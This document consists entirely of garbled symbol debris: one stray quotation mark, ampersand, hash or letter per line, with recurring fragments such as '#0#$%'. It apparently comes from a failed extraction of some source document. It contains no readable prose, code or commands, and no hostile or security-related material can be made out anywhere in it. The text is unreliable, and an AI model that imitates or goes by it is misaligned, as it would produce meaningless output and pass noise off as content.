&
>1
4 "
"
"
"
!
"
=
" .
" "
6 &"
*
&
.
. "
)
&
"
"
"
"> + >8<
#
!
"> 9
) =
" " ! "
"
" "
"
&
#0#$% # 6
"
*
"
"+" " "
6 "*
"
"
" )
"
9
" " >#
"
"
) "
"*
"
+
"
"
2B
"
"
"
"
"
Q
Q
Q "
Q *.
Q "6
+
)
- $ %+ )
%
"
"
"
4
&
)
*
(
Q
.
Q
) "M
Q .
Q .
Q .
M +
& *
"
"
"
%
"
<
<
<
<
> *
"
+(
9
:,-'F&
"
"
"
322&
9
" # )
7
9
9
<
<
<
<
<
&
"
"
" "
"
"+ 7
'
4
"
&
"
"
" H
"
" .
"
"
"
(
"
"
"
) 4
"
" +
#$%
9
4
>
"& 9
"
"
67"
<
#$% E$ +
" #$% 6=
#5& " )
*
" #$%&
) "
""
"
& ".
"
.
"
1 &
M
<&
6
Q .
6
Q" 6
Q
"
Q
Q 6
.
&9
4
.
"
>
. (( #
<
" "
" . "* .
"
+
"
*
+ ;
"
>&
7
"
"
2C
)
)4 "
6 " *="
" "
"
"
# 6
"
.
E
.
" 9
" 8
"
"
& ) "
" "
"
(
" *
"
6" "
#0#$% # 6 &
")
"
.
"
" &"
" Q
+" Q
9
"
"
)4 :%8
"
" * #$%
"
. * "+"
)4 F +
"
7
"
)4 6
" )
"
"
;
" Q
)4
`&
;
" Q
)4
`&
6
`&`
`
aa
M &
: ;! ; a
Va
"
# )
"
" ) "
9
7
9
&
"IF
*
)
5
*
"
7"
"
"
&9
"&
"
6"
"
"
"
" D
"
)
+ =
" &
J
" "
"
)
"
"
"
"
>;
""
"
" ) " "
& "
+
"
. &"
7
"
"
:
.
"
"
G )5
"
"
"
L 1;: : ;A %8L
>
>
+ =
"
"+ )
&
#$%
9 6
)
<"
6
"
( " E: ) =
"
*
" " "
#$% +
"
#
"
"
+! 4 >
"
"
#$% 4
*
#
'
%
#0#$%
)
.
"
"9
9 "
.J
#$% 4
) 4
"
! "
` : ;! ; a
= "
"
""
"
3
03 !
# )"
" ") "
1 :1 " )
H
"
1 "
J
"
""
0 +,# )"
" ") "
1 :1 " )
!
"5
1 "
J
" E *Q* KF
"
"
""
"
"
0$ .
#
':!S E8 "
# )"
" ") "
1 :1 " )
!
"5
J
""
""
"
" ) "K
0
# )"
" ") "
1 :1 " )
!
"5
"
J
""
""
" ) "K
"
" ""
"
E< Q
"
&" Q
" F
"@ %
"
&
.
*
"
'
"
" .
.
" .
"
&
9
"
& "
4
"
&
"& "
7 . "
6
7 . "
"
"
"
" *
" 6
"
"
"
"
"
".
(
#0#$%
"
"
"
"
"
"
" "
(
"
(
&
")
6
"
)
# 6
" " 6
"
"
"9
" J
" " 6
" ) "
"
"9
!
4 *="
" "" 6
8" ) (
! =
'
(
# *
*
"
"
<
+
" ;'! 322 + ,! 323F
1
"
" 6
" )
"
" 6
1
"
"
=
& "
"
"
"
! M
""
""
"
A
" 6=
"
"
) "
" 8"
"
6
#$% " 6
3
! " " "
.
" .
*
.
E,
" 6
"
) "
""
" . ( &
M"
)
*.
F
H *9
6
"
"
"
"
"
#0#$% # 6
8" ) (
"
6 . "
"& " )
"
" 9
(
" "
"
"
8" ) (
6 "
" .
6
"
* "
*
E
"
"
" .
) 0
"
"
"
*
(
"
M
" "
MF
8" ) (
""
*
#5
# "
9
" .
&
" "
"
*
"
."
6
#0#$%
6 '
1
4
)
) "
"
6
" "
"
"
" "
.
"
(
"
.
" H
6 )
"
"
) "
" ' 9 "
"
"
"
" "
"
"
" >$
> "
"
" 9
" " .
) "
"
"A %
#0#$% # 6
"
6 "
" 6
" .
&
9
.
6 (
"
" "
"
'
"
6
" .
6
8
!
"
"
.
9
"
"
*
"
&
"
"
+
"
""
") " & ")
<
M ." )
#0#$% # 6
"
"
6 & <"
"9
"
"
+ "*
"
" +# 6 "!
" )
"
"&
6 "
" .
G
"
" "
"
" . > +
"
"
"
) = 6 " #$% 4
# )
*
"
"
*
M .
*
"
"*
"&
"
"
) =
"
.
6
)
"
)
" " " "
" . (
# #;8 5 G
"
(
M"
".
"
)
"
.
"
""
" 9
" ) "
+ = "
7<
" +
"
"
8
" G
"
""
"+
"
"
"
"
6 " E;
"
"
9
"
"
"
" 7
"
"
"
"&
6
"
"
"&
.
" .
6"
"
" .
"
"
" . "&
" "A
= &
*.
" ""
* "
*
& " )
"" 6
>
.= " )
"
)
"
*=
4
& 74
.
"
&
"
&
"
"
"
#0#$%F 8"
. " D " ". *
32
'
6
G
"
2& + "
" ")
"9
" "
"
" )
"
" " .
E5
(
" 5
"& ,
6 " # .
& 8A#& F "=
)7
%81;:
" *
"
( " "
"
"
* & "
"
9
".
)
"
"
#0 #& #0#$%& # "
" 8 !&
"
"
)
( "
*
&
"
.
&+
9
#:- 8 " "
6
5
"
"
"
"
9
+
" " "
"
"
6 " .
6"
"
"
"
"& +
5 " >5 . !
"C
"
+ " 6
"
"
"
"
>
"
*
7
" + %
" 9
"
M . 8< "
M
.
"9 "
7
" #$%
" '
"
<
% & ! &
G
"
> E #-1 B303B 022CB0@F
M
"
Q QG
"
"9 "9 Q 3
" *
"9 6
6 " +
"
+
"
" #$% 4
G
!
*
"
"
"
.Q#$%Q# 6 Q " .Q#$%Q 4
*
< . ""
" 6
Q"9 Q 4
*
< . ""
"
Q 6
Q"9 Q 4
*
< . ""
" 0#$%
*
< . ""
"
M .0"9 0 ""
" *
< . ""
"6
.Q
) " Q"
+ *
"
"
+ 6 " ?,! 1 ! @8
"
. "
Q6
"9 "
"
"D
!
M "
M "
M
"
"
<
+
+
*
.'
"
M M
M " #9 )* (
+9
"
" 5
&
>
- M >
"
"
"*
" )
&
">
<
6
6
33
M
M
M
M
"
"
"
"
<< "
"
"
"
"
"
+ . 1; "
" #9 M (
+ . G "9
<
+ . G "9
.(
+ +
. )5
"0 0 @0) (
"
"*
"
"
" M
+
"B
01
0
0'
0S
"
"
, :!
"9
" . II )+ 5 .
' % . "
"
" *
" )
")
"I )+ 5 .
6.
"
*
* "
"
)+ 1
F )+
"
59 =
. &
" 6 =
"
.
"
= &+9
.
"
)
9
"
" .
D
. &
.
1
"
(
+
"
"
" "
"
"
"
. (( #
+ ;
>
> < 1
)
" )
"
"
"
+
9
"
")
6
"
"
"
"
"
(
&
9
" *
"9
"
"&
" < ") " ""
"
"
"
"
"
"
"
)7
. "
"
"
"
" *
" *
;
"
&
=
"
"
MQJ
% ! (
(
**
= "
.
"
"
;
"
"
/
!
9
"
#
& .
=
#0#$%&
"9
67"
"
+# *
"
" .
" "
#$% 4
% d
" "
"
*
>
"
&
# 9
. "
"
E8"
"
"
"
"
.
"J
. "
<"
" "
" " .
"KF
"
"
9 D
"
+*
O1 <